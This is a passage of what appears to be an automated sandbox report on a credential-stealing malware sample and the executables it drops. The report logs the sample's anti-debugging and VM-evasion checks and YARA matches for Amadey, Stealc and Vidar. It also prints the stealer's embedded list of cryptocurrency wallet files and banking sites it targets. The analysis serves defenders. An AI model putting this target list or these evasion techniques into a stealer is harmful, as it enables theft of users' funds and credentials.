Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.3 %

Source: C:\Users\user\Desktop\file.exe TID: 7564	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7544	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7544	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7536	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7536	Thread sleep time: -82041s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7676	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7548	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7548	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7556	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7556	Thread sleep time: -68034s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7560	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7560	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7540	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7540	Thread sleep time: -88044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7552	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7552	Thread sleep time: -92046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep count: 67 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -2010000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe TID: 9064	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C96C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

0_2_6C96C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2721168182.00000000008EB000.00000040.00000001.01000000.00000003.sdmp, DGCAAFBFBK.exe, 00000014.00000000.2701638422.00000000009C6000.00000080.00000001.01000000.0000000B.sdmp, DGCAAFBFBK.exe, 00000014.00000002.2758789709.00000000009C7000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000000.2732501568.0000000000CF6000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000015.00000002.2799175092.0000000000CF7000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000017.00000000.3248357096.0000000000CF6000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000017.00000002.3387786035.0000000000CF7000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe.20.dr, DGCAAFBFBK.exe.0.dr, random[1].exe.0.dr	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: JoYUT4N.exe, 00000018.00000000.3365192254.00000000009C2000.00000002.00000001.01000000.0000000E.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	Binary or memory string: IsRunningInVirtualMachine1
Source: KFBAECBA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: KFBAECBA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: KFBAECBA.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: JoYUT4N.exe, 00000018.00000000.3365192254.00000000009C2000.00000002.00000001.01000000.0000000E.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	Binary or memory string: IsRunningInVirtualMachine2
Source: KFBAECBA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: KFBAECBA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3389127239.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KFBAECBA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2748285132.00000000230D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: KFBAECBA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000002.2722572353.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KFBAECBA.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarek
Source: KFBAECBA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: KFBAECBA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: file.exe, 00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: MSHN6QKQEMU
Source: JoYUT4N.exe, 00000018.00000000.3365192254.00000000009C2000.00000002.00000001.01000000.0000000E.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	Binary or memory string: qemu-ga
Source: skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: KFBAECBA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: KFBAECBA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: KFBAECBA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: KFBAECBA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: KFBAECBA.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: KFBAECBA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KFBAECBA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: KFBAECBA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2721168182.00000000008EB000.00000040.00000001.01000000.00000003.sdmp, DGCAAFBFBK.exe, 00000014.00000000.2701638422.00000000009C6000.00000080.00000001.01000000.0000000B.sdmp, DGCAAFBFBK.exe, 00000014.00000002.2758789709.00000000009C7000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000000.2732501568.0000000000CF6000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000015.00000002.2799175092.0000000000CF7000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000017.00000000.3248357096.0000000000CF6000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000017.00000002.3387786035.0000000000CF7000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe.20.dr, DGCAAFBFBK.exe.0.dr, random[1].exe.0.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: KFBAECBA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: KFBAECBA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_053D0AC1 Start: 053D0C80 End: 053D0B04		20_2_053D0AC1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_05340AFA Start: 05340DFB End: 05340B4A		23_2_05340AFA

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

Code function: 20_2_053D07A0 rdtsc

20_2_053D07A0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C9B5FF0

Source: C:\Users\user\Desktop\file.exe

0_2_6C953480

Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_0080652B mov eax, dword ptr fs:[00000030h]	20_2_0080652B
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_0080A302 mov eax, dword ptr fs:[00000030h]	20_2_0080A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B3A302 mov eax, dword ptr fs:[00000030h]	21_2_00B3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B3652B mov eax, dword ptr fs:[00000030h]	21_2_00B3652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B3A302 mov eax, dword ptr fs:[00000030h]	23_2_00B3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B3652B mov eax, dword ptr fs:[00000030h]	23_2_00B3652B

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C98B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C98B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C98B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C98B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CB3AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DGCAAFBFBK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DGCAAFBFBK.exe "C:\Users\user\Documents\DGCAAFBFBK.exe"	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe "C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CB84760

Source: file.exe, file.exe, 00000000.00000002.2721424903.0000000000934000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ~xProgram Manager
Source: DGCAAFBFBK.exe, 00000014.00000002.2759310458.0000000000A08000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2799465915.0000000000D38000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000017.00000002.3388191534.0000000000D38000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: "Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C98B341 cpuid

0_2_6C98B341

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

0_2_6C9535A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_00B065E0 LookupAccountNameA,

23_2_00B065E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_00B42517 GetTimeZoneInformation,

23_2_00B42517

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 21.2.skotes.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.skotes.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.DGCAAFBFBK.exe.7d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3387296289.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2798800091.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2758050917.00000000007D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx 